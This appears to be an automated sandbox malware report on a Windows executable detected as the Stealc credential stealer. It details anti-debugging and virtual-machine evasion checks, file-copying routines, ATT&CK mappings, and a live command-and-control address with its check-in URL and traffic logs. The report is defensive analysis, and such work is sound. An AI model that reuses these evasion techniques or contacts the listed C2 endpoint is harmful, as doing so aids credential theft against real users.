                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF03BB second address: 4EF03DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F72FCC0D44Fh 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF03DB second address: 4EF03F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72FCF2ACD7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1055D6A second address: 1055D74 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F72FCC0D446h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: EA1BA2 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: EA1ACC instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00C538B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C54910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C54910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C4DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00C4DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C4E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00C4E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C54570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00C54570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C4ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00C4ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C416D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C53EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00C53EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C4F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C4F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C4BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00C4BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C4DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C4DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C41160 GetSystemInfo,ExitProcess,0_2_00C41160
                Source: file.exe, file.exe, 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1702489973.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1702489973.00000000008F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1702489973.000000000087E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13346
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13343
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13357
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13365
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13397
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C445C0 VirtualProtect ?,00000004,00000100,000000000_2_00C445C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C59860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00C59860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C59750 mov eax, dword ptr fs:[00000030h]0_2_00C59750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C578E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_00C578E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7260, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C59600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00C59600
                Source: file.exe, 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: #Program Manager
                Source: file.exeBinary or memory string: Y#Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00C57B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C57980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00C57980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C57850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00C57850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C57A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00C57A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.c40000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1702489973.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1662202182.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7260, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.c40000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1702489973.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1662202182.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7260, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php#19%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.phps17%VirustotalBrowse
                http://185.215.113.37/ws17%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37Ofile.exe, 00000000.00000002.1702489973.000000000087E000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37file.exe, 00000000.00000002.1702489973.000000000087E000.00000004.00000020.00020000.00000000.sdmptrue
                  • URL Reputation: malware
                  		unknown
                  http://185.215.113.37/e2b1563c6670f193.php&8file.exe, 00000000.00000002.1702489973.00000000008E5000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37/e2b1563c6670f193.phpDWFfile.exe, 00000000.00000002.1702489973.00000000008DA000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://185.215.113.37/wsfile.exe, 00000000.00000002.1702489973.00000000008DA000.00000004.00000020.00020000.00000000.sdmptrueunknown
                      http://185.215.113.37/e2b1563c6670f193.php#file.exe, 00000000.00000002.1702489973.00000000008C5000.00000004.00000020.00020000.00000000.sdmptrueunknown
                      http://185.215.113.37/e2b1563c6670f193.phpsfile.exe, 00000000.00000002.1702489973.00000000008C5000.00000004.00000020.00020000.00000000.sdmptrueunknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      185.215.113.37
                      		unknownPortugal
                      		206894WHOLESALECONNECTIONSNLtrue

                      General Information

                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1522624
                      Start date and time:2024-09-30 13:10:10 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 2m 47s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:1
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:file.exe
                      Detection:MAL
                      Classification:mal100.troj.evad.winEXE@1/0@0/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 80%
                      • Number of executed functions: 19
                      • Number of non-executed functions: 86
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Stop behavior analysis, all processes terminated

                      Simulations

                      Behavior and APIs

                      No simulations

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      185.215.113.37file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      4qIl08vrFY.exeGet hashmaliciousAmadey, StealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      SecuriteInfo.com.Win32.Evo-gen.16378.4678.exeGet hashmaliciousAmadey, StealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php

                      Domains

                      No context

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37
                      4qIl08vrFY.exeGet hashmaliciousAmadey, StealcBrowse
                      • 185.215.113.103
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37
                      SecuriteInfo.com.Win32.Evo-gen.16378.4678.exeGet hashmaliciousAmadey, StealcBrowse
                      • 185.215.113.103
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      No created / dropped files found

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.948735669322834
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:file.exe
                      File size:1'867'776 bytes
                      MD5:bb08552092b4a0fe9610493efde4ddfc
                      SHA1:e4bd47f98aa7e1d41c6c2265ca45d606b49ba023
                      SHA256:094b280b1e8ecb2574307e5f44d1678b3abe07c71ebfe779a7dd914bf789292b
                      SHA512:628ee5f98b6707073e80752df9a8b2d628dde1deb9ae7a0c712880d0b3530b390d98c3a049f4d3cb0d0d465ad2b42664829c014f80959df5e19b5ec391b25edb
                      SSDEEP:49152:9s1ARbBuUn5UYkPP2TFy7f3ocwCAtuWHkKaf:m1AhBuUhkP+fZC/WETf
                      TLSH:858533EDB382DBA8CDD4A6F5469C1D40FEDA6213DA13973A470E93013E3763826853B5
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                      File Icon

                      Icon Hash:90cececece8e8eb0

                      Static PE Info

                      General

                      Entrypoint:0xaa6000
                      Entrypoint Section:.taggant
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                      Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:1
                      File Version Major:5
                      File Version Minor:1
                      Subsystem Version Major:5
                      Subsystem Version Minor:1
                      Import Hash:2eabe9054cad5152567f0699947a2c5b

                      Entrypoint Preview

                      Instruction
                      jmp 00007F72FD26F3DAh
                      divps xmm3, dqword ptr [eax+eax]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      jmp 00007F72FD2713D5h
                      add byte ptr [0000000Ah], al
                      add byte ptr [eax], al
                      add byte ptr [eax], dh
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      or byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [0000000Ah], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [ecx], al
                      add byte ptr [eax], 00000000h
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      adc byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add dword ptr [edx], ecx
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al

                      Rich Headers

                      Programming Language:
                      • [C++] VS2010 build 30319
                      • [ASM] VS2010 build 30319
                      • [ C ] VS2010 build 30319
                      • [ C ] VS2008 SP1 build 30729
                      • [IMP] VS2008 SP1 build 30729
                      • [LNK] VS2010 build 30319

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      0x10000x25b0000x22800a84b16048fba261587a0ec40c9c06fceunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      0x25e0000x2a50000x200580dc5fb122f25d12a3156e521a31420unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      nouqlerf0x5030000x1a20000x1a1e00401bf41b3971cf06f9d15484ae4b4cc3False0.9947534961112773data7.953428476394443IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      fksviyxr0x6a50000x10000x400429b9ae4f83436d1999e8fce4a3380d8False0.7353515625data5.9050409701924025IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .taggant0x6a60000x30000x22002f6861d2b80c6d2cb11378982e4f20dbFalse0.06112132352941176DOS executable (COM)0.7575021689405903IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                      Imports

                      DLLImport
                      kernel32.dlllstrcpy

                      Network Behavior

                      Suricata IDS Alerts

                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                      2024-09-30T13:11:02.926589+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449730185.215.113.3780TCP

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Sep 30, 2024 13:11:01.988337040 CEST4973080192.168.2.4185.215.113.37
                      Sep 30, 2024 13:11:01.993266106 CEST8049730185.215.113.37192.168.2.4
                      Sep 30, 2024 13:11:01.993345022 CEST4973080192.168.2.4185.215.113.37
                      Sep 30, 2024 13:11:01.993458033 CEST4973080192.168.2.4185.215.113.37
                      Sep 30, 2024 13:11:01.998192072 CEST8049730185.215.113.37192.168.2.4
                      Sep 30, 2024 13:11:02.694272995 CEST8049730185.215.113.37192.168.2.4
                      Sep 30, 2024 13:11:02.694339991 CEST4973080192.168.2.4185.215.113.37
                      Sep 30, 2024 13:11:02.696522951 CEST4973080192.168.2.4185.215.113.37
                      Sep 30, 2024 13:11:02.701349020 CEST8049730185.215.113.37192.168.2.4
                      Sep 30, 2024 13:11:02.926529884 CEST8049730185.215.113.37192.168.2.4
                      Sep 30, 2024 13:11:02.926589012 CEST4973080192.168.2.4185.215.113.37
